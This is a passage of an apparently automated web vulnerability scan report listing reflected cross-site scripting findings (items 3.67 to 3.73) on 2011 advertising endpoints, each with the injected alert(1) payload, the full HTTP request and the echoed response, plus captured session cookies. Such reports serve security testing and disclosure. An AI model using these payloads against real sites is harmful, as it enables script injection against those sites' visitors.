This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/8205e'-alert(1)-'fa7ea69290f&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

3.67. http://ib.adnxs.com/ab [tt_code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8c9'-alert(1)-'aca8e4c3d50 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-85d8c9'-alert(1)-'aca8e4c3d50&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

3.68. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0961'%3balert(1)//77258745e1c was submitted in the redir parameter. This input was echoed as e0961';alert(1)//77258745e1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ptj?member=311&inv_code=cm.yearbook&size=300x250&imp_id=cm-10306552516_1311271251,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D218732%3Bcontx%3Dgames%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1520731557%3Fe0961'%3balert(1)//77258745e1c HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.I>u3?!7G'6v$WPt[fR4#aoQ.`e#:wJBP@1>+^X$?SUr+(fV+'zvLnT#=)OqIw

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIz34QChgCIAIoAjDz0qHxBBDz0qHxBBgB; path=/; expires=Wed, 19-Oct-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb477086=5_[r^208WM^9#a*>bPMv^E$G`?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPxSPy36XVUUdg472aqBQblpzaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAAoBABAgUCAQUAAAAAUB_tOAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271283%29%3Buf%28%27c%27%2C+39654%2C+1311271283%29%3Buf%28%27r%27%2C+425550%2C+1311271283%29%3Bppv%281279%2C+%272109186109648637716%27%2C+1311271283%2C+1311876083%2C+39654%2C+24039%29%3Bppv%285150%2C+%272109186109648637716%27%2C+1311271283%2C+1311357683%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA; path=/; expires=Fri, 22-Jul-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LEhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?Werk8MLb?d'RcKEk]=lqA^u!V!N%k=JTSWLp1V1MQf1/f-Nd>; path=/; expires=Wed, 19-Oct-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:01:23 GMT
Content-Length: 413

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10306552516_1311271251,11fda490648f83c,games,ax.80-bz.25;;cmw=owl;sz=300x250;net=cm;ord1=218732;contx=games;an=80;dc=w;btg=bz.25;ord=1520731557?e0961';alert(1)//77258745e1c">
...[SNIP]...

3.69. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/16024/128483/lifescript-470x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb81b'%3balert(1)//5d194e610e6 was submitted in the mpck parameter. This input was echoed as bb81b';alert(1)//5d194e610e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/16024/128483/lifescript-470x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16024-128483-16880-2%3Fmpt%3D80352151311276189929bb81b'%3balert(1)//5d194e610e6&mpt=80352151311276189929&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243260174%3B0-0%3B0%3B31210306%3B6510-470/250%3B42925500/42943287/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Btile%3D16%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;sz=470x250;ord=101352252258050
Cookie: svid=396408271523; __utmz=183366586.1305458947.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.647930298.1305458947.1305458947.1305458947.1; mojo3=16024:16880

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:41 GMT
Server: Apache
Last-Modified: Thu, 30 Jun 2011 17:46:51 GMT
ETag: "4a9bc3-461e-4a6f17c6278c0"
Accept-Ranges: bytes
Content-Length: 18628
Content-Type: application/x-javascript

document.write( "<style>" );
document.write( ".selectOptional {display:none;}" );
document.write( ".headline_blockAD_____78296 {position:absolute;left:0px;top:10px;width:470px;height:30px;font-famil
...[SNIP]...
dhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;~sscs=?http://altfarm.mediaplex.com/ad/ck/16024-128483-16880-2?mpt=80352151311276189929bb81b';alert(1)//5d194e610e6?mpre=' + encodeURIComponent(url);
} else {
var redir = '';
if (RedirectURLAD_____78296 == '**' + 'redirecturl**') {
RedirectURLAD_____78296 = '';
}

try {
var ar = (docum
...[SNIP]...

3.70. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/16024/128483/lifescript-470x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 408db'%3balert(1)//f589db99a52 was submitted in the mpvc parameter. This input was echoed as 408db';alert(1)//f589db99a52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/16024/128483/lifescript-470x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16024-128483-16880-2%3Fmpt%3D80352151311276189929&mpt=80352151311276189929&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243260174%3B0-0%3B0%3B31210306%3B6510-470/250%3B42925500/42943287/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Btile%3D16%3B%7Esscs%3D%3f408db'%3balert(1)//f589db99a52 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;sz=470x250;ord=101352252258050
Cookie: svid=396408271523; __utmz=183366586.1305458947.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.647930298.1305458947.1305458947.1305458947.1; mojo3=16024:16880

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:59 GMT
Server: Apache
Last-Modified: Thu, 30 Jun 2011 17:46:51 GMT
ETag: "4a9bc3-461e-4a6f17c6278c0"
Accept-Ranges: bytes
Content-Length: 18656
Content-Type: application/x-javascript

document.write( "<style>" );
document.write( ".selectOptional {display:none;}" );
document.write( ".headline_blockAD_____78296 {position:absolute;left:0px;top:10px;width:470px;height:30px;font-famil
...[SNIP]...
2943287/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;~sscs=?408db';alert(1)//f589db99a52' != ('<mp' + 'vc/>
...[SNIP]...

3.71. http://jlinks.industrybrains.com/jsct [ct parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 8b1a3<script>alert(1)</script>88ce88e2adb was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS8b1a3<script>alert(1)</script>88ce88e2adb&num=4&layt=624x300&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:23 GMT
Content-Type: application/x-javascript
Content-Length: 85

// Error: Unknown old section SCMAGAZINE_ROS8b1a3<script>alert(1)</script>88ce88e2adb

3.72. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d8ec<script>alert(1)</script>5143365a5aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp&8d8ec<script>alert(1)</script>5143365a5aa=1 HTTP/1.1
Host: jlinks.industrybrains.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:44 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter 8d8ec<script>alert(1)</script>5143365a5aa

3.73. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 1cc9e<script>alert(1)</script>3aea9239800 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G076081cc9e<script>alert(1)</script>3aea9239800 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e4a9497&1&10165&4e23b001&1f1a384c105a2f365a2b2d6af5f27c36; rtc_Ua1q=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